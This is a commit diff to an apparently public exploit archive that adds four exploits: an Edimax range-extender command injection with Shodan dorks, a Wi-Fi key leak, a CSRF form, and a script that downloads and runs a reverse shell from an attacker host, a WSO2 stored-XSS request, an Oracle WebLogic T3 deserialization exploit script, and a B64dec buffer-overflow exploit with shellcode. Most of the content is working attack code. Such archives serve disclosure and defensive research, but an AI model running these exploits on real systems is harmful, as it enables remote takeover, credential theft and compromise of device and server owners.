DB: 2020-04-15

4 changes to exploits/shellcodes B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter) Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution WSO2 3.1.0 - Persistent Cross-Site Scripting Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
2020-04-15 05:01:49 +00:00 · 2020-04-15 05:01:49 +00:00 · 0137126a8e
commit 0137126a8e
parent be2aa5d840
5 changed files with 333 additions and 0 deletions
--- a/exploits/hardware/webapps/48318.txt
+++ b/exploits/hardware/webapps/48318.txt
@ -0,0 +1,42 @@
+# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
+# Date: 2020-04-13
+# Exploit Author: Wadeek
+# Hardware Version: EW-7438RPn-v3 Mini
+# Firmware Version: 1.23 / 1.27
+# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
+# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip
+
+== Shodan Dorks ==
+
+(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"
+(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"
+
+== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==
+
+GET /wizard_reboot.asp
+showSSID = "<WIRELESS-NAME>";
+document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');
+
+== Command Execution * ==
+
+(Setup Mode)
+curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'
+
+(Unsetup Mode with default password)
+curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'
+
+== Cross-Site Request Forgery -> Command Execution * ==
+
+<form action="http://edimaxext.setup/goform/mp" method="POST">
+	<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
+	<input type="submit" value="">
+</form>
+
+* [ delivery.sh ]
+--------------------------------------------------------------------------------------
+# (msfvenom) linux/mipsbe/shell/reverse_tcp
+cd /tmp/
+busybox wget -O reverse http://<LHOST>/reverse
+busybox chmod +x reverse
+./reverse &
+--------------------------------------------------------------------------------------
--- a/exploits/java/webapps/48319.txt
+++ b/exploits/java/webapps/48319.txt
@ -0,0 +1,142 @@
+# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
+# Date: 2020-04-13
+# Author: raki ben hamouda
+# Vendor: https://apim.docs.wso2.com
+# Softwrare link: https://apim.docs.wso2.com/en/latest/
+# CVE: N/A
+# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700
+
+Technical Details & Description:
+================================
+A remote Stored Cross Site Scripting has been discovered in WSO2 API
+Manager Ressource Browser component).
+The security vulnerability allows a remote attacker With access to the
+component "Ressource Browser"
+to inject a malicious code in Add Comment Feature.
+
+The vulnerability is triggered after sending a POST request to
+`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
+"comment=targeted&path=%2F".
+Remote attackers has the ablility to spread a malware,to Hijack a session
+(a session with Higher privileges), or to initiate phishing attacks.
+
+The security risk of the Stored XSS web vulnerability is estimated as
+medium with a cvss (common vulnerability scoring system) count of 5.4
+Exploitation of the Stored XSS web vulnerability requires a low privilege
+web-application user account and medium or high user interaction.
+Successful exploitation of the vulnerability results in Compromising the
+server .
+
+
+Request Method:
+[+] POST
+
+Module:
+[+] /carbon/info/comment-ajaxprocessor.jsp
+
+Parameters:
+[+] comment=admincomment
+[+] path=%2F
+=======================================
+
+POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
+Host: 192.168.149.1:9443
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
+X-Requested-With: XMLHttpRequest, XMLHttpRequest
+X-Prototype-Version: 1.5.0
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
+Content-Length: 64
+Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
+wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
+JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
+requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
+region4_monitor_menu=none; region5_tools_menu=none;
+current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
+Connection: close
+
+comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F
+
+
+
+
+
+==============================
+
+
+
+HTTP/1.1 200
+
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1; mode=block
+X-Frame-Options: DENY
+vary: accept-encoding
+Content-Type: text/html;charset=UTF-8
+Content-Language: en-US
+Date: Tue, 31 Dec 2019 10:50:00 GMT
+Connection: close
+Server: WSO2 Carbon Server
+Content-Length: 3144
+
+
+//the body of response includes attacker malicious script
+
+
+<a class="closeButton icon-link registryWriteOperation"
+onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
+style="background-image:
+url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a>
+
+
+ <iframe href=http://phishing_url>
+ <br/>
+posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker
+
+
+
+Proof of Concept (PoC):
+=======================
+
+//Let's suppose we're Attacking an admin with higher privileges
+
+
+
+1-Attacker opens his account
+
+2-add arbitrary comment
+
+
+3-intercepts the request
+
+
+4-add malicious script to the comment
+
+
+5-admin access his account,he wants to add a comment,the malicious script
+got executed
+
+
+===>Admin account compromised
+
+
+
+===============================================================================
+
+
+
+Example malicious script :
+
+
+<script>
+  alert(document.cookie);
+</script>
+
+
+
+===============================================================================
--- a/exploits/java/webapps/48320.py
+++ b/exploits/java/webapps/48320.py
@ -0,0 +1,90 @@
+# Exploit Title: Oracle WebLogic Server 12.2.1.4.0  -  Remote Code Execution
+# Author: nu11secur1ty
+# Date: 2020-03-31
+# Vendor: Oracle
+# Software Link:  https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip  
+# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
+# CVE: CVE-2020-2555
+
+
+[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
+[+] Source:  readme from GitHUB
+
+
+[Exploit Program Code]
+--------------------------
+
+#!/usr/bin/python
+# @nu11secur1ty
+import socket
+import os
+import sys
+import struct
+
+if len(sys.argv) < 3:
+    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
+    sys.exit()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(5)
+
+server_address = (sys.argv[1], int(sys.argv[2]))
+print '[+] Connecting to %s port %s' % server_address
+sock.connect(server_address)
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print 'sending "%s"' % headers
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+
+payloadObj = open(sys.argv[3],'rb').read()
+
+payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
+payload=payload+payloadObj
+payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
+
+payload=struct.pack('>I',len(payload)) + payload[4:]
+
+print '[+] Sending payload...'
+sock.send(payload)
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+
+
+[Vendor]
+Oracle
+
+
+[Vulnerability Type]
+Network Remote
+
+
+
+[Description]
+Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
+Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
+Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
+Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
+CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+[Disclosure Timeline]
+2019/12/10
+
+
+[+] Disclaimer
+The entry creation date may reflect when the CVE ID was allocated or reserved,
+and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
+
+[Video]
+https://www.youtube.com/watch?v=59jt8rr8ECc 
+
+@nu11secur1ty  
+
+-- 
+
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty
--- a/exploits/windows/local/48317.py
+++ b/exploits/windows/local/48317.py
@ -0,0 +1,55 @@
+# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
+# Date: 2020-04-13
+# Exploit Author: Andy Bowden
+# Vendor Homepage: http://4mhz.de/b64dec.html
+# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
+# Version: Base64 Decoder 1.1.2
+# Tested on: Windows 10 x86
+
+#Instructions:
+# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode. 
+
+f = open("crash.txt", "wb")
+
+padding1   = b"ERCDERCD" 
+padding1  += b"\x90" * 100
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
+# cmd=calc.exe exitfunc=thread -f python
+payload =  b""
+payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+egghunter  = b"\x8B\xFD"                # mov edi,ebp
+egghunter += b"\xB8\x45\x52\x43\x44"    # mov eax,45525344 ERCD                       
+egghunter += b"\x47"                    # inc edi                                                                 
+egghunter += b"\x39\x07"                # cmp dword ptr ds:[edi],eax                                  
+egghunter += b"\x75\xFB"                # jne                             
+egghunter += b"\x39\x07"                # cmp dword ptr ds:[edi],eax                                  
+egghunter += b"\x75\xF7"                # jne        
+egghunter += b"\xFF\xE7"                # jmp edi
+
+buf = padding1 + payload 
+buf += b"\x90" * (580 - len(padding1 + payload))
+buf += egghunter
+buf += b"\x90" * (620 - len(buf))
+buf += b"\x90\x90\xEB\xCE"
+buf += b"\x86\x1e\x40" #00401e86
+
+f.write(buf)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11027,6 +11027,7 @@ id,file,description,date,author,type,platform,port
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
 48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
+48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42557,3 +42558,6 @@ id,file,description,date,author,type,platform,port
 48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
 48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
 48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
+48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
+48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
+48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0  -  Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,